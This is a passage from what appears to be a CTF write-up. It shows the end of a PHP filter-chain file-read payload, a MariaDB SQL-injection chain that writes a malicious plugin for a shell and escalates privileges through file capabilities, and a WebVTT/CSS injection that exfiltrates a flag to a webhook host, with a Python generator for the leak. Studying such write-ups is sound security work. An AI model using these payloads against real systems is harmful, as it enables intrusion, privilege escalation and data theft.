.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-e
ncode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/var/www/html/public/index.php"
}
}
ezmaria
Solved by: rmb122, crumbledwall, z3ratu1
load_file can read files directly, and the challenge itself lives at /var/www/html/index.php:
1 union select 1,(select load_file("/var/www/html/index.php")) limit 1,1
Certain statements are blacklisted.
The challenge allows stacked queries. CREATE FUNCTION is unavailable, but INSTALL PLUGIN ... SONAME can load a shared library.
Also dumpfile is not banned, so files can be written directly:
1; select from_base64('xx') into dumpfile '/mysql/plugin/xxx.so';
After some debugging, INSTALL PLUGIN kept failing; it turned out the mysql database did not exist, so create it by hand.
Step one, pop a shell:
1;create database mysql;create table mysql.plugin(name varchar(64), dl varchar(128));select FROM_BASE64('...') into dumpfile '/mysql/plugin/xxxx.so';INSTALL PLUGIN testx SONAME 'xxxx.so';
Following the hint, find / -exec getcap {} \; 2>/dev/null shows that
the mariadb client has cap_setfcap:
/usr/bin/mariadb cap_setfcap=ep
So first write readflag:
Then write another plugin that calls cap_set_file to give readflag cap_setuid=ep,
and load the malicious .so with the mariadb client: mariadb --plugin-dir=/mysql/plugin/ --default-auth=setcap
readflag can then escalate to root and read the flag.
ytiruces
Solved by: hpdoger, ucasz, crumbledwall, z3ratu1
Use a text-format VTT subtitle file to leak the flag through cue styling.
https://developer.mozilla.org/en-US/docs/Web/API/WebVTT_API#styling_webvtt_cues
A simple test:
/static/1.vtt
WEBVTT
00:00.000-->00:04.000
<v n1ctf{testdd5}
payload:
<video controls autoplay muted src="https://interactive-examples.mdn.mozilla.net/media/cc0-videos/friday.mp4">
<track default kind="captions" srclang="en" src="/static/1.vtt" />
</video>hhh<style>
@font-face {
font-family: "fz";
src: url(https://webhook.site/xxxxxx/?q=z);
}
video {
width: 250px;
}
video::cue(v[voice^="n1"]) {
font-size: 1rem;
font-family: fz;
color: red;
}
</style>
We got a callback, so with a few tweaks to the code above, a script plus some manual work leaks the flag one character at a time.
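The per-character leak described above, as an added example that is not the team's script. It generates, for a known prefix, one @font-face rule per candidate next character together with a ::cue(v[voice^="..."]) rule that selects it, so the font URL the victim's browser fetches reveals the next character. The callback URL (the webhook.site placeholder from the payload above), the candidate alphabet and the simulate_victim stand-in for the browser are assumptions of this example; the flag value is the constructed test string from the 1.vtt file above.

```python
import string
from urllib.parse import quote

EXFIL = "https://webhook.site/xxxxxx/"  # placeholder callback URL, as in the payload above
ALPHABET = string.ascii_lowercase + string.digits + "_{}"  # assumed flag alphabet


def css_string(s):
    """Escape a value for use inside a double-quoted CSS string."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def cue_leak_style(known_prefix, exfil=EXFIL, alphabet=ALPHABET):
    """Return (css, probes). One @font-face per candidate next character; the browser only
    fetches a font when some ::cue(v[voice^="<prefix+char>"]) rule matches the caption's
    voice name, so the callback that fires identifies the next character.
    probes maps each font URL back to the guess it encodes."""
    rules, probes = [], {}
    for i, ch in enumerate(alphabet):
        guess = known_prefix + ch
        url = f"{exfil}?q={quote(guess, safe='')}"
        probes[url] = guess
        rules.append(f'@font-face {{ font-family: "fz{i}"; src: url({url}); }}')
        rules.append(f'video::cue(v[voice^="{css_string(guess)}"]) {{ font-family: fz{i}; }}')
    css = "<style>\nvideo { width: 250px; }\n" + "\n".join(rules) + "\n</style>"
    return css, probes


def simulate_victim(probes, voice):
    """Constructed stand-in for the victim browser: the font URLs it would request for a cue
    whose voice name is `voice`, given the prefix selectors above."""
    return [url for url, guess in probes.items() if voice.startswith(guess)]


def leak_flag(fetch_fonts, known_prefix="n1", max_len=64):
    """Extend the prefix by one character per round until no probe fires.
    fetch_fonts(css, probes) returns the list of font URLs the victim requested."""
    flag = known_prefix
    while len(flag) < max_len:
        css, probes = cue_leak_style(flag)
        hits = fetch_fonts(css, probes)
        if not hits:
            break
        flag = probes[hits[0]]
    return flag


def vtt_demo():
    voice = "n1ctf{testdd5}"  # constructed cue voice, matching the 1.vtt test above
    return leak_flag(lambda css, probes: simulate_victim(probes, voice))
```

In the real attack the css string is what gets injected into the page, fetch_fonts is the manual step of reading which URL arrived at the webhook, and each round needs a fresh page load because a browser fetches a given font family at most once per document. Using ^= (prefix match) means exactly one rule matches per round, and the round in which nothing fires marks the end of the flag.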